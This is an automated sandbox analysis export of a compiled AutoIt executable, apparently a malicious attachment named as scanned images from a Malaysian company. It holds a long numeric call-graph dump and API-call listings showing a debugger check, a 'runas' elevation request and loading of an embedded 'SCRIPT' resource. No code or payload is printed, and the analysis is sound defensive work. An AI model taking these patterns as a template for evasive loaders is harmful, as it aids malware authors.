a40ff6 Mailbox 59 API calls 100288->100289 100290 a24de5 100289->100290 100486 a2538e 100290->100486 100292 a24df1 _memmove 100293 a24e2c 100292->100293 100294 a24f21 100292->100294 100295 a24ee9 100292->100295 100296 a25027 69 API calls 100293->100296 
100500 a89ba5 95 API calls 100294->100500 100489 a24fe9 CreateStreamOnHGlobal 100295->100489 100300 a24e35 100296->100300 100299 a2506b 74 API calls 100299->100300 100300->100299 100301 a24ec9 100300->100301 100303 a5dcd0 100300->100303 100495 a25045 100300->100495 100301->100183 100304 a25045 85 API calls 100303->100304 100305 a5dce4 100304->100305 100306 a2506b 74 API calls 100305->100306 100306->100301 100308 a5ddf6 100307->100308 100309 a2507d 100307->100309 100524 a45812 100309->100524 100312 a89393 100722 a891e9 100312->100722 100314 a893a9 100314->100190 100316 a25036 100315->100316 100317 a5ddb9 100315->100317 100727 a45e90 100316->100727 100319 a2503e 100319->100192 100321 a24d2e 100320->100321 100322 a24d6a LoadLibraryA 100320->100322 100321->100274 100321->100275 100322->100321 100323 a24d7b GetProcAddress 100322->100323 100323->100321 100326 a454ac _doexit 100324->100326 100325 a454bf 100373 a48d68 58 API calls __getptd_noexit 100325->100373 100326->100325 100328 a454f0 100326->100328 100343 a50738 100328->100343 100329 a454c4 100374 a48ff6 9 API calls __read_nolock 100329->100374 100332 a454f5 100333 a454fe 100332->100333 100334 a4550b 100332->100334 100375 a48d68 58 API calls __getptd_noexit 100333->100375 100336 a45535 100334->100336 100337 a45515 100334->100337 100358 a50857 100336->100358 100376 a48d68 58 API calls __getptd_noexit 100337->100376 100339 a454cf _doexit @_EH4_CallFilterFunc@8 100339->100280 100344 a50744 _doexit 100343->100344 100345 a49e4b __lock 58 API calls 100344->100345 100356 a50752 100345->100356 100346 a507c6 100378 a5084e 100346->100378 100347 a507cd 100383 a48a5d 58 API calls 2 library calls 100347->100383 100350 a50843 _doexit 100350->100332 100351 a507d4 100351->100346 100384 a4a06b InitializeCriticalSectionAndSpinCount 100351->100384 100354 a49ed3 __mtinitlocknum 58 API calls 100354->100356 100355 a507fa EnterCriticalSection 100355->100346 100356->100346 100356->100347 100356->100354 100381 a46e8d 59 API calls __lock 
100356->100381 100382 a46ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100356->100382 100366 a50877 __wopenfile 100358->100366 100359 a50891 100389 a48d68 58 API calls __getptd_noexit 100359->100389 100361 a50896 100390 a48ff6 9 API calls __read_nolock 100361->100390 100363 a45540 100377 a45562 LeaveCriticalSection LeaveCriticalSection _fseek 100363->100377 100364 a50aaf 100386 a587f1 100364->100386 100366->100359 100372 a50a4c 100366->100372 100391 a43a0b 60 API calls 3 library calls 100366->100391 100368 a50a45 100368->100372 100392 a43a0b 60 API calls 3 library calls 100368->100392 100370 a50a64 100370->100372 100393 a43a0b 60 API calls 3 library calls 100370->100393 100372->100359 100372->100364 100373->100329 100374->100339 100375->100339 100376->100339 100377->100339 100385 a49fb5 LeaveCriticalSection 100378->100385 100380 a50855 100380->100350 100381->100356 100382->100356 100383->100351 100384->100355 100385->100380 100394 a57fd5 100386->100394 100388 a5880a 100388->100363 100389->100361 100390->100363 100391->100368 100392->100370 100393->100372 100397 a57fe1 _doexit 100394->100397 100395 a57ff7 100479 a48d68 58 API calls __getptd_noexit 100395->100479 100397->100395 100399 a5802d 100397->100399 100398 a57ffc 100480 a48ff6 9 API calls __read_nolock 100398->100480 100405 a5809e 100399->100405 100402 a58049 100481 a58072 LeaveCriticalSection __unlock_fhandle 100402->100481 100404 a58006 _doexit 100404->100388 100406 a580be 100405->100406 100407 a4471a __wsopen_nolock 58 API calls 100406->100407 100410 a580da 100407->100410 100408 a49006 __invoke_watson 8 API calls 100409 a587f0 100408->100409 100412 a57fd5 __wsopen_helper 103 API calls 100409->100412 100411 a58114 100410->100411 100415 a58137 100410->100415 100428 a58211 100410->100428 100413 a48d34 __read_nolock 58 API calls 100411->100413 100414 a5880a 100412->100414 100416 a58119 100413->100416 100414->100402 100419 a581f5 100415->100419 100427 a581d3 100415->100427 100417 a48d68 __recalloc 58 API 
calls 100416->100417 100418 a58126 100417->100418 100420 a48ff6 __read_nolock 9 API calls 100418->100420 100421 a48d34 __read_nolock 58 API calls 100419->100421 100422 a58130 100420->100422 100423 a581fa 100421->100423 100422->100402 100424 a48d68 __recalloc 58 API calls 100423->100424 100425 a58207 100424->100425 100426 a48ff6 __read_nolock 9 API calls 100425->100426 100426->100428 100429 a4d4d4 __alloc_osfhnd 61 API calls 100427->100429 100428->100408 100430 a582a1 100429->100430 100431 a582ce 100430->100431 100432 a582ab 100430->100432 100434 a57f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100431->100434 100433 a48d34 __read_nolock 58 API calls 100432->100433 100435 a582b0 100433->100435 100445 a582f0 100434->100445 100436 a48d68 __recalloc 58 API calls 100435->100436 100438 a582ba 100436->100438 100437 a5836e GetFileType 100439 a58379 GetLastError 100437->100439 100440 a583bb 100437->100440 100443 a48d68 __recalloc 58 API calls 100438->100443 100444 a48d47 __dosmaperr 58 API calls 100439->100444 100449 a4d76a __set_osfhnd 59 API calls 100440->100449 100441 a5833c GetLastError 100442 a48d47 __dosmaperr 58 API calls 100441->100442 100446 a58361 100442->100446 100443->100422 100447 a583a0 CloseHandle 100444->100447 100445->100437 100445->100441 100448 a57f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100445->100448 100452 a48d68 __recalloc 58 API calls 100446->100452 100447->100446 100450 a583ae 100447->100450 100451 a58331 100448->100451 100456 a583d9 100449->100456 100453 a48d68 __recalloc 58 API calls 100450->100453 100451->100437 100451->100441 100452->100428 100454 a583b3 100453->100454 100454->100446 100455 a58594 100455->100428 100458 a58767 CloseHandle 100455->100458 100456->100455 100457 a51b11 __lseeki64_nolock 60 API calls 100456->100457 100472 a5845a 100456->100472 100459 a58443 100457->100459 100460 a57f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100458->100460 100462 a48d34 __read_nolock 58 API calls 
100459->100462 100459->100472 100461 a5878e 100460->100461 100463 a58796 GetLastError 100461->100463 100464 a587c2 100461->100464 100462->100472 100465 a48d47 __dosmaperr 58 API calls 100463->100465 100464->100428 100467 a587a2 100465->100467 100466 a5848c 100470 a599f2 __chsize_nolock 82 API calls 100466->100470 100466->100472 100471 a4d67d __free_osfhnd 59 API calls 100467->100471 100468 a510ab 70 API calls __read_nolock 100468->100472 100469 a50d2d __close_nolock 61 API calls 100469->100472 100470->100466 100471->100464 100472->100455 100472->100466 100472->100468 100472->100469 100473 a4dac6 __write 78 API calls 100472->100473 100474 a58611 100472->100474 100475 a51b11 60 API calls __lseeki64_nolock 100472->100475 100473->100472 100476 a50d2d __close_nolock 61 API calls 100474->100476 100475->100472 100477 a58618 100476->100477 100478 a48d68 __recalloc 58 API calls 100477->100478 100478->100428 100479->100398 100480->100404 100481->100404 100483 a24ce1 100482->100483 100484 a24d9d LoadLibraryA 100482->100484 100483->100284 100483->100285 100484->100483 100485 a24dae GetProcAddress 100484->100485 100485->100483 100487 a40ff6 Mailbox 59 API calls 100486->100487 100488 a253a0 100487->100488 100488->100292 100490 a25003 FindResourceExW 100489->100490 100494 a25020 100489->100494 100491 a5dd5c LoadResource 100490->100491 100490->100494 100492 a5dd71 SizeofResource 100491->100492 100491->100494 100493 a5dd85 LockResource 100492->100493 100492->100494 100493->100494 100494->100293 100496 a5ddd4 100495->100496 100497 a25054 100495->100497 100501 a45a7d 100497->100501 100499 a25062 100499->100300 100500->100293 100504 a45a89 _doexit 100501->100504 100502 a45a9b 100514 a48d68 58 API calls __getptd_noexit 100502->100514 100504->100502 100505 a45ac1 100504->100505 100516 a46e4e 100505->100516 100507 a45aa0 100515 a48ff6 9 API calls __read_nolock 100507->100515 100508 a45ac7 100522 a459ee 83 API calls 4 library calls 100508->100522 100511 a45aab _doexit 100511->100499 
100512 a45ad6 100523 a45af8 LeaveCriticalSection LeaveCriticalSection _fseek 100512->100523 100514->100507 100515->100511 100517 a46e80 EnterCriticalSection 100516->100517 100518 a46e5e 100516->100518 100519 a46e76 100517->100519 100518->100517 100520 a46e66 100518->100520 100519->100508 100521 a49e4b __lock 58 API calls 100520->100521 100521->100519 100522->100512 100523->100511 100527 a4582d 100524->100527 100526 a2508e 100526->100312 100528 a45839 _doexit 100527->100528 100529 a4587c 100528->100529 100530 a4584f _memset 100528->100530 100531 a45874 _doexit 100528->100531 100532 a46e4e __lock_file 59 API calls 100529->100532 100554 a48d68 58 API calls __getptd_noexit 100530->100554 100531->100526 100534 a45882 100532->100534 100540 a4564d 100534->100540 100535 a45869 100555 a48ff6 9 API calls __read_nolock 100535->100555 100543 a45668 _memset 100540->100543 100546 a45683 100540->100546 100541 a45673 100652 a48d68 58 API calls __getptd_noexit 100541->100652 100543->100541 100543->100546 100551 a456c3 100543->100551 100544 a45678 100653 a48ff6 9 API calls __read_nolock 100544->100653 100556 a458b6 LeaveCriticalSection LeaveCriticalSection _fseek 100546->100556 100548 a457d4 _memset 100655 a48d68 58 API calls __getptd_noexit 100548->100655 100551->100546 100551->100548 100557 a44916 100551->100557 100564 a510ab 100551->100564 100632 a50df7 100551->100632 100654 a50f18 58 API calls 4 library calls 100551->100654 100554->100535 100555->100531 100556->100531 100558 a44935 100557->100558 100559 a44920 100557->100559 100558->100551 100656 a48d68 58 API calls __getptd_noexit 100559->100656 100561 a44925 100657 a48ff6 9 API calls __read_nolock 100561->100657 100563 a44930 100563->100551 100565 a510e3 100564->100565 100566 a510cc 100564->100566 100568 a5181b 100565->100568 100573 a5111d 100565->100573 100667 a48d34 58 API calls __getptd_noexit 100566->100667 100683 a48d34 58 API calls __getptd_noexit 100568->100683 100570 a510d1 100668 a48d68 58 API calls __getptd_noexit 
100570->100668 100571 a51820 100684 a48d68 58 API calls __getptd_noexit 100571->100684 100574 a51125 100573->100574 100581 a5113c 100573->100581 100669 a48d34 58 API calls __getptd_noexit 100574->100669 100577 a51131 100685 a48ff6 9 API calls __read_nolock 100577->100685 100578 a5112a 100670 a48d68 58 API calls __getptd_noexit 100578->100670 100580 a51151 100671 a48d34 58 API calls __getptd_noexit 100580->100671 100581->100580 100584 a5116b 100581->100584 100585 a51189 100581->100585 100612 a510d8 100581->100612 100584->100580 100587 a51176 100584->100587 100672 a48a5d 58 API calls 2 library calls 100585->100672 100658 a55ebb 100587->100658 100588 a51199 100590 a511a1 100588->100590 100591 a511bc 100588->100591 100673 a48d68 58 API calls __getptd_noexit 100590->100673 100675 a51b11 60 API calls 3 library calls 100591->100675 100592 a5128a 100594 a51303 ReadFile 100592->100594 100599 a512a0 GetConsoleMode 100592->100599 100597 a51325 100594->100597 100598 a517e3 GetLastError 100594->100598 100596 a511a6 100674 a48d34 58 API calls __getptd_noexit 100596->100674 100597->100598 100605 a512f5 100597->100605 100601 a512e3 100598->100601 100602 a517f0 100598->100602 100603 a512b4 100599->100603 100604 a51300 100599->100604 100615 a512e9 100601->100615 100676 a48d47 58 API calls 3 library calls 100601->100676 100681 a48d68 58 API calls __getptd_noexit 100602->100681 100603->100604 100607 a512ba ReadConsoleW 100603->100607 100604->100594 100614 a515c7 100605->100614 100605->100615 100617 a5135a 100605->100617 100607->100605 100608 a512dd GetLastError 100607->100608 100608->100601 100610 a517f5 100682 a48d34 58 API calls __getptd_noexit 100610->100682 100612->100551 100613 a42f95 _free 58 API calls 100613->100612 100614->100615 100620 a516cd ReadFile 100614->100620 100615->100612 100615->100613 100616 a51447 100616->100615 100622 a51504 100616->100622 100623 a514f4 100616->100623 100626 a514b4 MultiByteToWideChar 100616->100626 100617->100616 100619 a513c6 ReadFile 
100617->100619 100621 a513e7 GetLastError 100619->100621 100628 a513f1 100619->100628 100624 a516f0 GetLastError 100620->100624 100631 a516fe 100620->100631 100621->100628 100622->100626 100679 a51b11 60 API calls 3 library calls 100622->100679 100678 a48d68 58 API calls __getptd_noexit 100623->100678 100624->100631 100626->100608 100626->100615 100628->100617 100677 a51b11 60 API calls 3 library calls 100628->100677 100631->100614 100680 a51b11 60 API calls 3 library calls 100631->100680 100633 a50e02 100632->100633 100637 a50e17 100632->100637 100719 a48d68 58 API calls __getptd_noexit 100633->100719 100635 a50e07 100720 a48ff6 9 API calls __read_nolock 100635->100720 100638 a50e4c 100637->100638 100643 a50e12 100637->100643 100721 a56234 58 API calls __malloc_crt 100637->100721 100640 a44916 __flush 58 API calls 100638->100640 100641 a50e60 100640->100641 100686 a50f97 100641->100686 100643->100551 100644 a50e67 100644->100643 100645 a44916 __flush 58 API calls 100644->100645 100646 a50e8a 100645->100646 100646->100643 100647 a44916 __flush 58 API calls 100646->100647 100648 a50e96 100647->100648 100648->100643 100649 a44916 __flush 58 API calls 100648->100649 100650 a50ea3 100649->100650 100651 a44916 __flush 58 API calls 100650->100651 100651->100643 100652->100544 100653->100546 100654->100551 100655->100544 100656->100561 100657->100563 100659 a55ec6 100658->100659 100661 a55ed3 100658->100661 100660 a48d68 __recalloc 58 API calls 100659->100660 100662 a55ecb 100660->100662 100663 a55edf 100661->100663 100664 a48d68 __recalloc 58 API calls 100661->100664 100662->100592 100663->100592 100665 a55f00 100664->100665 100666 a48ff6 __read_nolock 9 API calls 100665->100666 100666->100662 100667->100570 100668->100612 100669->100578 100670->100577 100671->100578 100672->100588 100673->100596 100674->100612 100675->100587 100676->100615 100677->100628 100678->100615 100679->100626 100680->100631 100681->100610 100682->100615 100683->100571 100684->100577 
100685->100612 100687 a50fa3 _doexit 100686->100687 100688 a50fc7 100687->100688 100689 a50fb0 100687->100689 100690 a5108b 100688->100690 100693 a50fdb 100688->100693 100691 a48d34 __read_nolock 58 API calls 100689->100691 100694 a48d34 __read_nolock 58 API calls 100690->100694 100692 a50fb5 100691->100692 100695 a48d68 __recalloc 58 API calls 100692->100695 100696 a51006 100693->100696 100697 a50ff9 100693->100697 100698 a50ffe 100694->100698 100707 a50fbc _doexit 100695->100707 100700 a51013 100696->100700 100701 a51028 100696->100701 100699 a48d34 __read_nolock 58 API calls 100697->100699 100703 a48d68 __recalloc 58 API calls 100698->100703 100699->100698 100704 a48d34 __read_nolock 58 API calls 100700->100704 100702 a4d446 ___lock_fhandle 59 API calls 100701->100702 100705 a5102e 100702->100705 100706 a51020 100703->100706 100708 a51018 100704->100708 100709 a51054 100705->100709 100710 a51041 100705->100710 100713 a48ff6 __read_nolock 9 API calls 100706->100713 100707->100644 100711 a48d68 __recalloc 58 API calls 100708->100711 100714 a48d68 __recalloc 58 API calls 100709->100714 100712 a510ab __read_nolock 70 API calls 100710->100712 100711->100706 100715 a5104d 100712->100715 100713->100707 100716 a51059 100714->100716 100718 a51083 __read LeaveCriticalSection 100715->100718 100717 a48d34 __read_nolock 58 API calls 100716->100717 100717->100715 100718->100707 100719->100635 100720->100643 100721->100638 100725 a4543a GetSystemTimeAsFileTime 100722->100725 100724 a891f8 100724->100314 100726 a45468 __aulldiv 100725->100726 100726->100724 100728 a45e9c _doexit 100727->100728 100729 a45ec3 100728->100729 100730 a45eae 100728->100730 100732 a46e4e __lock_file 59 API calls 100729->100732 100741 a48d68 58 API calls __getptd_noexit 100730->100741 100734 a45ec9 100732->100734 100733 a45eb3 100742 a48ff6 9 API calls __read_nolock 100733->100742 100743 a45b00 67 API calls 7 library calls 100734->100743 100737 a45ed4 100744 a45ef4 LeaveCriticalSection 
LeaveCriticalSection _fseek 100737->100744 100739 a45ebe _doexit 100739->100319 100740 a45ee6 100740->100739 100741->100733 100742->100739 100743->100737 100744->100740 100745->100208 100746->100210 100747->100207 100748->100220 100749->100219 100752 a899d2 __tzset_nolock _wcscmp 100750->100752 100751 a2506b 74 API calls 100751->100752 100752->100751 100753 a89393 GetSystemTimeAsFileTime 100752->100753 100754 a89866 100752->100754 100755 a25045 85 API calls 100752->100755 100753->100752 100754->100226 100754->100255 100755->100752 100757 a88da9 100756->100757 100758 a88d9b 100756->100758 100760 a88dee 100757->100760 100761 a4548b 115 API calls 100757->100761 100786 a88db2 100757->100786 100759 a4548b 115 API calls 100758->100759 100759->100757 100787 a8901b 100760->100787 100763 a88dd3 100761->100763 100763->100760 100765 a88ddc 100763->100765 100764 a88e32 100766 a88e57 100764->100766 100769 a88e36 100764->100769 100767 a455d6 __fcloseall 83 API calls 100765->100767 100765->100786 100791 a88c33 100766->100791 100767->100786 100770 a88e43 100769->100770 100772 a455d6 __fcloseall 83 API calls 100769->100772 100775 a455d6 __fcloseall 83 API calls 100770->100775 100770->100786 100772->100770 100773 a88e85 100800 a88eb5 100773->100800 100774 a88e65 100776 a88e72 100774->100776 100778 a455d6 __fcloseall 83 API calls 100774->100778 100775->100786 100780 a455d6 __fcloseall 83 API calls 100776->100780 100776->100786 100778->100776 100780->100786 100783 a88ea0 100785 a455d6 __fcloseall 83 API calls 100783->100785 100783->100786 100785->100786 100786->100254 100788 a89040 100787->100788 100790 a89029 __tzset_nolock _memmove 100787->100790 100789 a45812 __fread_nolock 74 API calls 100788->100789 100789->100790 100790->100764 100792 a4594c __crtCompareStringA_stat 58 API calls 100791->100792 100793 a88c42 100792->100793 100794 a4594c __crtCompareStringA_stat 58 API calls 100793->100794 100795 a88c56 100794->100795 100796 a4594c __crtCompareStringA_stat 58 API calls 

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A23B7A
                                                        • IsDebuggerPresent.KERNEL32 ref: 00A23B8C
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE62F8,00AE62E0,?,?), ref: 00A23BFD
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                          • Part of subcall function 00A30A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A23C26,00AE62F8,?,?,?), ref: 00A30ACE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A23C81
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00AD93F0,00000010), ref: 00A5D4BC
                                                        • SetCurrentDirectoryW.KERNEL32(?,00AE62F8,?,?,?), ref: 00A5D4F4
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AD5D40,00AE62F8,?,?,?), ref: 00A5D57A
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A5D581
                                                          • Part of subcall function 00A23A58: GetSysColorBrush.USER32(0000000F), ref: 00A23A62
                                                          • Part of subcall function 00A23A58: LoadCursorW.USER32(00000000,00007F00), ref: 00A23A71
                                                          • Part of subcall function 00A23A58: LoadIconW.USER32(00000063), ref: 00A23A88
                                                          • Part of subcall function 00A23A58: LoadIconW.USER32(000000A4), ref: 00A23A9A
                                                          • Part of subcall function 00A23A58: LoadIconW.USER32(000000A2), ref: 00A23AAC
                                                          • Part of subcall function 00A23A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A23AD2
                                                          • Part of subcall function 00A23A58: RegisterClassExW.USER32(?), ref: 00A23B28
                                                          • Part of subcall function 00A239E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A23A15
                                                          • Part of subcall function 00A239E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23A36
                                                          • Part of subcall function 00A239E7: ShowWindow.USER32(00000000,?,?), ref: 00A23A4A
                                                          • Part of subcall function 00A239E7: ShowWindow.USER32(00000000,?,?), ref: 00A23A53
                                                          • Part of subcall function 00A243DB: _memset.LIBCMT ref: 00A24401
                                                          • Part of subcall function 00A243DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A244A6
                                                        Strings
                                                        • runas, xrefs: 00A5D575
                                                        • This is a third-party compiled AutoIt script., xrefs: 00A5D4B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 529118366-3287110873
                                                        • Opcode ID: 46781cb24c21db465f1f94631a61d97e8c2317cd868e758cae949548c23b18e5
                                                        • Instruction ID: 8839341f7a09864a94b109c913bf896318e09bfeaf2199e4b24c09b3a3f6a5b3
                                                        • Opcode Fuzzy Hash: 46781cb24c21db465f1f94631a61d97e8c2317cd868e758cae949548c23b18e5
                                                        • Instruction Fuzzy Hash: 5A511531D08299AECF11EBF8ED45EFE7B78BF16340B004575F9116A1A1DA748A0ACB21

                                                        Control-flow Graph

                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 00A24B2B
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        • GetCurrentProcess.KERNEL32(?,00AAFAEC,00000000,00000000,?), ref: 00A24BF8
                                                        • IsWow64Process.KERNEL32(00000000), ref: 00A24BFF
                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00A24C45
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A24C50
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00A24C81
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00A24C8D
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: 969d68f08d42f616e3b94cf5492484324a25fa77b46b108c71c1c377a88dfe3f
                                                        • Instruction ID: 363b383440d0f4a67002115667d2e98b940206de680059b3ab70722f8f4f51f8
                                                        • Opcode Fuzzy Hash: 969d68f08d42f616e3b94cf5492484324a25fa77b46b108c71c1c377a88dfe3f
                                                        • Instruction Fuzzy Hash: E591C33154A7D0DEC732DB7C95511AABFF4BF2A301B444EADE4CA93A41D230E948C769

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1063 a24fe9-a25001 CreateStreamOnHGlobal 1064 a25003-a2501a FindResourceExW 1063->1064 1065 a25021-a25026 1063->1065 1066 a25020 1064->1066 1067 a5dd5c-a5dd6b LoadResource 1064->1067 1066->1065 1067->1066 1068 a5dd71-a5dd7f SizeofResource 1067->1068 1068->1066 1069 a5dd85-a5dd90 LockResource 1068->1069 1069->1066 1070 a5dd96-a5ddb4 1069->1070 1070->1066
                                                        APIs
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A24EEE,?,?,00000000,00000000), ref: 00A24FF9
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A24EEE,?,?,00000000,00000000), ref: 00A25010
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00A24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A24F8F), ref: 00A5DD60
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00A24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A24F8F), ref: 00A5DD75
                                                        • LockResource.KERNEL32(00A24EEE,?,?,00A24EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A24F8F,00000000), ref: 00A5DD88
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: efa65e6714c0d656b2b8a80c3b13df5319acc05ed2028fcb0a9890e2e6d60e52
                                                        • Instruction ID: ba6626d6f213095279e1208e2b57008b218f824476d47bb922fd910f669a0922
                                                        • Opcode Fuzzy Hash: efa65e6714c0d656b2b8a80c3b13df5319acc05ed2028fcb0a9890e2e6d60e52
                                                        • Instruction Fuzzy Hash: 58118C75600701AFD7248BA9EC48FA77BB9FBCAB11F104168F405C62A0DB71EC058660
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,00A5E7C1), ref: 00A846A6
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00A846B7
                                                        • FindClose.KERNEL32(00000000), ref: 00A846C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 1a5d0e19db821f25c96e91fcd8de394f95d1d476978f873846b5be1c08209198
                                                        • Instruction ID: 749b8a1839be7c62cdc80e520add8ab4dbde61a3f651bb8db459beca93708351
                                                        • Opcode Fuzzy Hash: 1a5d0e19db821f25c96e91fcd8de394f95d1d476978f873846b5be1c08209198
                                                        • Instruction Fuzzy Hash: DEE0D8314148025F4614B7B8EC4D4EA7B9C9E0B335F100725F835C10E0F7B05D548695
                                                        Strings
                                                        • Variable must be of type 'Object'., xrefs: 00A6428C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Variable must be of type 'Object'.
                                                        • API String ID: 0-109567571
                                                        • Opcode ID: c1fa34582bf28924b08dc28939a42873c596736cd6e5a052cd68e0dbad303e8b
                                                        • Instruction ID: 77d9948c212f6443b11c80deb0493c4cd23fea38bc65888f224771d1b1e2daea
                                                        • Opcode Fuzzy Hash: c1fa34582bf28924b08dc28939a42873c596736cd6e5a052cd68e0dbad303e8b
                                                        • Instruction Fuzzy Hash: DAA28D75A04225CFCB24CF98E580AAEB7B1FF58300F648179E916AB351D735ED82CB91
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A30BBB
                                                        • timeGetTime.WINMM ref: 00A30E76
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A30FB3
                                                        • TranslateMessage.USER32(?), ref: 00A30FC7
                                                        • DispatchMessageW.USER32(?), ref: 00A30FD5
                                                        • Sleep.KERNEL32(0000000A), ref: 00A30FDF
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00A3105A
                                                        • DestroyWindow.USER32 ref: 00A31066
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A31080
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00A652AD
                                                        • TranslateMessage.USER32(?), ref: 00A6608A
                                                        • DispatchMessageW.USER32(?), ref: 00A66098
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A660AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
